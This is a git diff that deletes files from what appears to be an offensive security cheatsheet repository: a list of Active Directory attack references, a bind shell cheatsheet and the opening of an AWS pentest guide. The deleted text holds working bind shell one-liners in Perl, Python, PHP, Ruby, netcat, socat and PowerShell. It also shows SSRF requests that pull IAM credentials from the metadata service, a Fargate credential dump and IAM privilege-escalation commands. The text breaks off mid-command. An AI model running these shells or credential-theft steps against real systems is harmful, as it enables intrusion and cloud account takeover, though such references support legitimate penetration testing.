2021](https://www.bussink.net/ad-cs-exploit-via-petitpotam-from-0-to-domain-domain/) -* [NTLMv1_Downgrade.md - S3cur3Th1sSh1t - 09/07/2021](https://gist.github.com/S3cur3Th1sSh1t/0c017018c2000b1d5eddf2d6a194b7bb) -* [UnPAC the hash - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash) -* [Lateral Movement – WebClient](https://pentestlab.blog/2021/10/20/lateral-movement-webclient/) -* [Shadow Credentials: Workstation Takeover Edition - Matthew Creel](https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition) -* [Certificate templates - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/certificate-templates) -* [CA configuration - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration) -* [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls) -* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints) -* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing) -* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) -* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4) -* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) -* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) -* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/) -* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/) -* [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/) -* [Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) - Oliver Lyak](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4) -* [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html) -* [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/) -* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) -* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials) -* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/) -* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9) -* [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond) -* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/) -* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire) -* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html) -* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/) -* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability) -* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/) -* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/) -* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) -* [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/) -* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867) -* [Poc’ing Beyond Domain Admin - Part 1 - cube0x0](https://cube0x0.github.io/Pocing-Beyond-DA/) -* [At the Edge of Tier Zero: The Curious Case of the RODC - Elad Shamir](https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06) -* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) -* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) -* [Timeroasting: Attacking Trust Accounts in Active Directory - Tom Tervoort - 01 March 2023](https://www.secura.com/blog/timeroasting-attacking-trust-accounts-in-active-directory) -* [TIMEROASTING, TRUSTROASTING AND COMPUTER SPRAYING WHITE PAPER - Tom Tervoort](https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf) -* [Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS - July 10, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/) -* [ADIDNS Revisited – WPAD, GQBL, and More - December 5, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/adidns-revisited/) -* [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/) -* [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse) -* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/) \ No newline at end of file diff --git a/Methodology and Resources/Bind Shell Cheatsheet.md b/Methodology and Resources/Bind Shell Cheatsheet.md deleted file mode 100644 index c51bb7e..0000000 --- a/Methodology and Resources/Bind Shell Cheatsheet.md +++ /dev/null @@ -1,95 +0,0 @@ -# Bind Shell - -## Summary - -* [Bind Shell](#bind-shell) - * [Perl](#perl) - * [Python](#python) - * [PHP](#php) - * [Ruby](#ruby) - * [Netcat Traditional](#netcat-traditional) - * [Netcat OpenBsd](#netcat-openbsd) - * [Ncat](#ncat) - * [Socat](#socat) - * [Powershell](#powershell) - - -## Perl - -```perl -perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\ -bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\ -close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};' -``` - -## Python - -Single line : -```python -python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",51337));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' -``` - -Expanded version : - -```python -import socket as s,subprocess as sp; - -s1 = s.socket(s.AF_INET, s.SOCK_STREAM); -s1.setsockopt(s.SOL_SOCKET, s.SO_REUSEADDR, 1); -s1.bind(("0.0.0.0", 51337)); -s1.listen(1); -c, a = s1.accept(); - -while True: - d = c.recv(1024).decode(); - p = sp.Popen(d, shell=True, stdout=sp.PIPE, stderr=sp.PIPE, stdin=sp.PIPE); - c.sendall(p.stdout.read()+p.stderr.read()) -``` - -## PHP - -```php -php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\ -socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\ -$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\ - socket_write($cl,$m,strlen($m));}}' -``` - -## Ruby - -```ruby -ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)' -``` - -## Netcat Traditional - -```powershell -nc -nlvp 51337 -e /bin/bash -``` - -## Netcat OpenBsd - -```powershell -rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f -``` - -## Socat - -```powershell -user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 -user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane -``` - -## Powershell - -```powershell -https://github.com/besimorhino/powercat - -# Victim (listen) -. .\powercat.ps1 -powercat -l -p 7002 -ep - -# Connect from attacker -. .\powercat.ps1 -powercat -c 127.0.0.1 -p 7002 -``` diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md deleted file mode 100644 index 070e255..0000000 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ /dev/null @@ -1,2339 +0,0 @@ -# Cloud - AWS - -> Amazon Web Services offers reliable, scalable, and inexpensive cloud computing services. - -## Summary - -- [AWS](#aws) - - [Summary](#summary) - - [Training](#training) - - [Tools](#tools) - - [AWS Patterns](#aws-patterns) - - [AWS - Metadata SSRF](#aws---metadata-ssrf) - - [Method for Elastic Cloud Compute (EC2)](#method-for-elastic-cloud-compute-ec2) - - [Method for Container Service (Fargate)](#method-for-container-service-fargate) - - [AWS API calls that return credentials](#aws-api-calls-that-return-credentials) - - [AWS - Shadow Admin](#aws---shadow-admin) - - [Admin equivalent permission](#admin-equivalent-permission) - - [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys) - - [AWS - Enumerate IAM permissions](#aws---enumerate-iam-permissions) - - [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux) - - [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image) - - [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance) - - [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code) - - [AWS - SSM - Command execution](#aws---ssm---command-execution) - - [AWS - Golden SAML Attack](#aws---golden-saml-attack) - - [AWS - Shadow Copy attack](#aws---shadow-copy-attack) - - [Disable CloudTrail](#disable-cloudtrail) - - [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty) - - [DynamoDB](#dynamodb) - - [Security checks](#security-checks) - - [AWSome Pentesting Cheatsheet](#awsome-pentesting-cheatsheet) - - [References](#references) - -## Training - -* AWSGoat : A Damn Vulnerable AWS Infrastructure - https://github.com/ine-labs/AWSGoat -* Damn Vulnerable Cloud Application - https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 -* SadCloud - https://github.com/nccgroup/sadcloud -* Flaws - http://flaws.cloud -* Cloudgoat - https://github.com/RhinoSecurityLabs/cloudgoat - -## Tools - -* [SkyArk](https://github.com/cyberark/SkyArk) - Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins - * Requires read-Only permissions over IAM service - ```powershell - $ git clone https://github.com/cyberark/SkyArk - $ powershell -ExecutionPolicy Bypass -NoProfile - PS C> Import-Module .\SkyArk.ps1 -force - PS C> Start-AWStealth - - or in the Cloud Console - - PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AWStealth/AWStealth.ps1') - PS C> Scan-AWShadowAdmins - ``` - -* [Pacu](https://github.com/RhinoSecurityLabs/pacu) - Exploit configuration flaws within an AWS environment using an extensible collection of modules with a diverse feature-set - * Requires AWS Keys - ```powershell - $ git clone https://github.com/RhinoSecurityLabs/pacu - $ bash install.sh - $ python3 pacu.py - set_keys/swap_keys - ls - run [--keyword-arguments] - run --regions eu-west-1,us-west-1 - - # https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details - ``` - -* [Bucket Finder](https://digi.ninja/projects/bucket_finder.php) - Search for public buckets, list and download all files if directory indexing is enabled - ```powershell - wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2 - ./bucket_finder.rb my_words - ./bucket_finder.rb --region ie my_words - US Standard = http://s3.amazonaws.com - Ireland = http://s3-eu-west-1.amazonaws.com - Northern California = http://s3-us-west-1.amazonaws.com - Singapore = http://s3-ap-southeast-1.amazonaws.com - Tokyo = http://s3-ap-northeast-1.amazonaws.com - - ./bucket_finder.rb --download --region ie my_words - ./bucket_finder.rb --log-file bucket.out my_words - ``` - -* [Boto3](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html) - Amazon Web Services (AWS) SDK for Python - ```python - import boto3 - # Create an S3 client - s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP3RKREDACTED',aws_secret_access_key='igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED',region_name='us-west-1') - - try: - result = s3.list_buckets() - print(result) - except Exception as e: - print(e) - ``` - -* [Prowler](https://github.com/toniblyx/prowler) - AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness - - > It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and DOZENS of additional checks including GDPR and HIPAA (+100). - * Require: arn:aws:iam::aws:policy/SecurityAudit - - ```powershell - $ pip install awscli ansi2html detect-secrets - $ git clone https://github.com/toniblyx/prowler - $ sudo apt install jq - $ ./prowler -E check42,check43 - $ ./prowler -p custom-profile -r us-east-1 -c check11 - $ ./prowler -A 123456789012 -R ProwlerRole # sts assume-role - ``` - -* [Principal Mapper](https://github.com/nccgroup/PMapper) - A tool for quickly evaluating IAM permissions in AWS - ```powershell - https://github.com/nccgroup/PMapper - pip install principalmapper - pmapper graph --create - pmapper visualize --filetype png - pmapper analysis --output-type text - - # Determine if PowerUser can escalate privileges - pmapper query "preset privesc user/PowerUser" - pmapper argquery --principal user/PowerUser --preset privesc - - # Find all principals that can escalate privileges - pmapper query "preset privesc *" - pmapper argquery --principal '*' --preset privesc - - # Find all principals that PowerUser can access - pmapper query "preset connected user/PowerUser *" - pmapper argquery --principal user/PowerUser --resource '*' --preset connected - - # Find all principals that can access PowerUser - pmapper query "preset connected * user/PowerUser" - pmapper argquery --principal '*' --resource user/PowerUser --preset connected - ``` - -* [ScoutSuite](https://github.com/nccgroup/ScoutSuite/wiki) - Multi-Cloud Security Auditing Tool - ```powershell - $ git clone https://github.com/nccgroup/ScoutSuite - $ python scout.py PROVIDER --help - # The --session-token is optional and only used for temporary credentials (i.e. role assumption). - $ python scout.py aws --access-keys --access-key-id --secret-access-key --session-token - $ python scout.py azure --cli - ``` - -* [s3_objects_check](https://github.com/nccgroup/s3_objects_check) - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files - ```powershell - $ git clone https://github.com/nccgroup/s3_objects_check - $ python3 -m venv env && source env/bin/activate - $ pip install -r requirements.txt - $ python s3-objects-check.py -h - $ python s3-objects-check.py -p whitebox-profile -e blackbox-profile - ``` - -* [cloudsplaining](https://github.com/salesforce/cloudsplaining) - An AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized report - ```powershell - $ pip3 install --user cloudsplaining - $ cloudsplaining download --profile myawsprofile - $ cloudsplaining scan --input-file default.json - ``` - -* [weirdAAL](https://github.com/carnal0wnage/weirdAAL/wiki) - AWS Attack Library - ```powershell - python3 weirdAAL.py -m ec2_describe_instances -t demo - python3 weirdAAL.py -m lambda_get_account_settings -t demo - python3 weirdAAL.py -m lambda_get_function -a 'MY_LAMBDA_FUNCTION','us-west-2' -t yolo - ``` - -* [cloudmapper](https://github.com/duo-labs/cloudmapper.git) - CloudMapper helps you analyze your Amazon Web Services (AWS) environments - ```powershell - git clone https://github.com/duo-labs/cloudmapper.git - # sudo yum install autoconf automake libtool python3-devel.x86_64 python3-tkinter python-pip jq awscli - # You may additionally need "build-essential" - sudo apt-get install autoconf automake libtool python3.7-dev python3-tk jq awscli - pipenv install --skip-lock - pipenv shell - report: Generate HTML report. Includes summary of the accounts and audit findings. - iam_report: Generate HTML report for the IAM information of an account. - audit: Check for potential misconfigurations. - collect: Collect metadata about an account. - find_admins: Look at IAM policies to identify admin users and roles, or principals with specific privileges - ``` - -* [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode -* [NetSPI/AWS Consoler](https://github.com/NetSPI/aws_consoler) - Convert AWS Credentials into a console access - - - -## AWS Patterns -| Service | URL | -|-------------|--------| -| s3 | https://{user_provided}.s3.amazonaws.com | -| cloudfront | https://{random_id}.cloudfront.net | -| ec2 | ec2-{ip-seperated}.compute-1.amazonaws.com | -| es | https://{user_provided}-{random_id}.{region}.es.amazonaws.com | -| elb | http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 | -| elbv2 | https://{user_provided}-{random_id}.{region}.elb.amazonaws.com | -| rds | mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 | -| rds | postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 | -| route 53 | {user_provided} | -| execute-api | https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} | -| cloudsearch | https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com | -| transfer | sftp://s-{random_id}.server.transfer.{region}.amazonaws.com | -| iot | mqtt://{random_id}.iot.{region}.amazonaws.com:8883 | -| iot | https://{random_id}.iot.{region}.amazonaws.com:8443 | -| iot | https://{random_id}.iot.{region}.amazonaws.com:443 | -| mq | https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162 | -| mq | ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 | -| kafka | b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com | -| kafka | {user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com | -| cloud9 | https://{random_id}.vfs.cloud9.{region}.amazonaws.com | -| mediastore | https://{random_id}.data.mediastore.{region}.amazonaws.com | -| kinesisvideo | https://{random_id}.kinesisvideo.{region}.amazonaws.com | -| mediaconvert | https://{random_id}.mediaconvert.{region}.amazonaws.com | -| mediapackage | https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel | - - -## AWS - Metadata SSRF - -> AWS released additional security defences against the attack. - -:warning: Only working with IMDSv1. -Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id --profile --http-endpoint enabled --http-token required`. - -In order to usr IMDSv2 you must provide a token. - -```powershell -export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"` -curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data" -``` - -### Method for Elastic Cloud Compute (EC2) - -Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/ - -1. Access the IAM : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/ - ```powershell - ami-id - ami-launch-index - ami-manifest-path - block-device-mapping/ - events/ - hostname - iam/ - identity-credentials/ - instance-action - instance-id - ``` -2. Find the name of the role assigned to the instance : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/ -3. Extract the role's temporary keys : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/ - ```powershell - { - "Code" : "Success", - "LastUpdated" : "2019-07-31T23:08:10Z", - "Type" : "AWS-HMAC", - "AccessKeyId" : "ASIA54BL6PJR37YOEP67", - "SecretAccessKey" : "OiAjgcjm1oi2xxxxxxxxOEXkhOMhCOtJMP2", - "Token" : "AgoJb3JpZ2luX2VjEDU86Rcfd/34E4rtgk8iKuTqwrRfOppiMnv", - "Expiration" : "2019-08-01T05:20:30Z" - } - ``` - -### Method for Container Service (Fargate) - -1. Fetch the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable from https://awesomeapp.com/download?file=/proc/self/environ - ```powershell - JAVA_ALPINE_VERSION=8.212.04-r0 - HOSTNAME=bbb3c57a0ed3SHLVL=1PORT=8443HOME=/root - AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447 - AWS_EXECUTION_ENV=AWS_ECS_FARGATEMVN_VER=3.3.9JAVA_VERSION=8u212AWS_DEFAULT_REGION=us-west-2 - ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/cb4f6285-48f2-4a51-a787-67dbe61c13ffPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin:/usr/lib/mvn:/usr/lib/mvn/binLANG=C.UTF-8AWS_REGION=us-west-2Tag=48111bbJAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jreM2=/usr/lib/mvn/binPWD=/appM2_HOME=/usr/lib/mvnLD_LIBRARY_PATH=/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64/server:/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64:/usr/lib/jvm/java-1.8-openjd - ``` -2. Use the credential URL to dump the AccessKey and SecretKey : https://awesomeapp.com/forward?target=http://169.254.170.2/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447 - ```powershell - { - "RoleArn": "arn:aws:iam::953574914659:role/awesome-waf-role", - "AccessKeyId": "ASIA54BL6PJR2L75XHVS", - "SecretAccessKey": "j72eTy+WHgIbO6zpe2DnfjEhbObuTBKcemfrIygt", - "Token": "FQoGZXIvYXdzEMj//////////wEaDEQW+wwBtaoyqH5lNSLGBF3PnwnLYa3ggfKBtLMoWCEyYklw6YX85koqNwKMYrP6ymcjv4X2gF5enPi9/Dx6m/1TTFIwMzZ3tf4V3rWP3HDt1ea6oygzTrWLvfdp57sKj+2ccXI+WWPDZh3eJr4Wt4JkiiXrWANn7Bx3BUj9ZM11RXrKRCvhrxdrMLoewRkWmErNEOFgbaCaT8WeOkzqli4f+Q36ZerT2V+FJ4SWDX1CBsimnDAMAdTIRSLFxVBBwW8171OHiBOYAMK2np1xAW1d3UCcZcGKKZTjBee2zs5+Rf5Nfkoq+j7GQkmD2PwCeAf0RFETB5EVePNtlBWpzfOOVBtsTUTFewFfx5cyNsitD3C2N93WR59LX/rNxyncHGDUP/6UPlasOcfzAaG738OJQmWfQTR0qksHIc2qiPtkstnNndh76is+r+Jc4q3wOWu2U2UBi44Hj+OS2UTpMAwc/MshIiGsUOrBQdPqcLLdAxKpUNTdSQNLg5wv4f2OrOI8/sneV58yBRolBz8DZoH8wohtLXpueDt8jsVSVLznnMOOe/4ehHE2Nt+Fy+tjaY5FUi/Ijdd5IrIdIvWFHY1XcPopUFYrDqr0yuZvX1YddfIcfdbmxf274v69FuuywXTo7cXk1QTMYZWlD/dPI/k6KQeO446UrHT9BJxcJMpchAIVRpI7nVKkSDwku1joKUG7DOeycuAbhecVZG825TocL0ks2yXPnIdvckAaU9DZf+afIV3Nxv3TI4sSX1npBhb2f/8C31pv8VHyu2NiN5V6OOHzZijHsYXsBQ==", - "Expiration": "2019-09-18T04:05:59Z" - } - ``` - - -### AWS API calls that return credentials - -- chime:createapikey -- [codepipeline:pollforjobs](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html) -- [cognito-identity:getopenidtoken](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html) -- [cognito-identity:getopenidtokenfordeveloperidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdTokenForDeveloperIdentity.html) -- [cognito-identity:getcredentialsforidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html) -- [connect:getfederationtoken](https://docs.aws.amazon.com/connect/latest/APIReference/API_GetFederationToken.html) -- [connect:getfederationtokens](https://docs.aws.amazon.com/connect/latest/APIReference/API_GetFederationToken.html) -- [ecr:getauthorizationtoken](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_GetAuthorizationToken.html) -- [gamelift:requestuploadcredentials](https://docs.aws.amazon.com/gamelift/latest/apireference/API_RequestUploadCredentials.html) -- [iam:createaccesskey](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateAccessKey.html) -- [iam:createloginprofile](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateLoginProfile.html) -- [iam:createservicespecificcredential](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateServiceSpecificCredential.html) -- [iam:resetservicespecificcredential](https://docs.aws.amazon.com/IAM/latest/APIReference/API_ResetServiceSpecificCredential.html) -- [iam:updateaccesskey](https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateAccessKey.html) -- [lightsail:getinstanceaccessdetails](https://docs.aws.amazon.com/lightsail/2016-11-28/api-reference/API_GetInstanceAccessDetails.html) -- [lightsail:getrelationaldatabasemasteruserpassword](https://docs.aws.amazon.com/lightsail/2016-11-28/api-reference/API_GetRelationalDatabaseMasterUserPassword.html) -- [rds-db:connect](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html) -- [redshift:getclustercredentials](https://docs.aws.amazon.com/redshift/latest/APIReference/API_GetClusterCredentials.html) -- [sso:getrolecredentials](https://docs.aws.amazon.com/singlesignon/latest/PortalAPIReference/API_GetRoleCredentials.html) -- [mediapackage:rotatechannelcredentials](https://docs.aws.amazon.com/mediapackage/latest/apireference/channels-id-credentials.html) -- [mediapackage:rotateingestendpointcredentials](https://docs.aws.amazon.com/mediapackage/latest/apireference/channels-id-ingest_endpoints-ingest_endpoint_id-credentials.html) -- [sts:assumerole](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role.html) -- [sts:assumerolewithsaml](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-saml.html) -- [sts:assumerolewithwebidentity](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html) -- [sts:getfederationtoken](https://docs.aws.amazon.com/cli/latest/reference/sts/get-federation-token.html) -- [sts:getsessiontoken](https://docs.aws.amazon.com/cli/latest/reference/sts/get-session-token.html) - - -## AWS - Shadow Admin - -### Admin equivalent permission - -- AdministratorAccess - - ```powershell - "Action": "*" - "Resource": "*" - ``` - -- **ec2:AssociateIamInstanceProfile** : attach an IAM instance profile to an EC2 instance - ```powershell - aws ec2 associate-iam-instance-profile --iam-instance-profile Name=admin-role --instance-id i-0123456789 - ``` - -- **iam:CreateAccessKey** : create a new access key to another IAM admin account - ```powershell - aws iam create-access-key –user-name target_user - ``` - -- **iam:CreateLoginProfile** : add a new password-based login profile, set a new password for an entity and impersonate it - ```powershell - $ aws iam create-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required - ``` - -- **iam:UpdateLoginProfile** : reset other IAM users’ login passwords. - ```powershell - $ aws iam update-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required - ``` - -- **iam:AttachUserPolicy**, **iam:AttachGroupPolicy** or **iam:AttachRolePolicy** : attach existing admin policy to any other entity he currently possesses - ```powershell - $ aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess - $ aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess - $ aws iam attach-role-policy –role-name role_i_can_assume –policy-arn arn:aws:iam::aws:policy/AdministratorAccess - ``` - -- **iam:PutUserPolicy**, **iam:PutGroupPolicy** or **iam:PutRolePolicy** : added inline policy will allow the attacker to grant additional privileges to previously compromised entities. - ```powershell - $ aws iam put-user-policy –user-name my_username –policy-name my_inline_policy –policy-document file://path/to/administrator/policy.json - ``` - -- **iam:CreatePolicy** : add a stealthy admin policy -- **iam:AddUserToGroup** : add into the admin group of the organization. - ```powershell - $ aws iam add-user-to-group –group-name target_group –user-name my_username - ``` - -- **iam:UpdateAssumeRolePolicy** + **sts:AssumeRole** : change the assuming permissions of a privileged role and then assume it with a non-privileged account. - ```powershell - $ aws iam update-assume-role-policy –role-name role_i_can_assume –policy-document file://path/to/assume/role/policy.json - ``` - -- **iam:CreatePolicyVersion** & **iam:SetDefaultPolicyVersion** : change customer-managed policies and change a non-privileged entity to be a privileged one. - ```powershell - $ aws iam create-policy-version –policy-arn 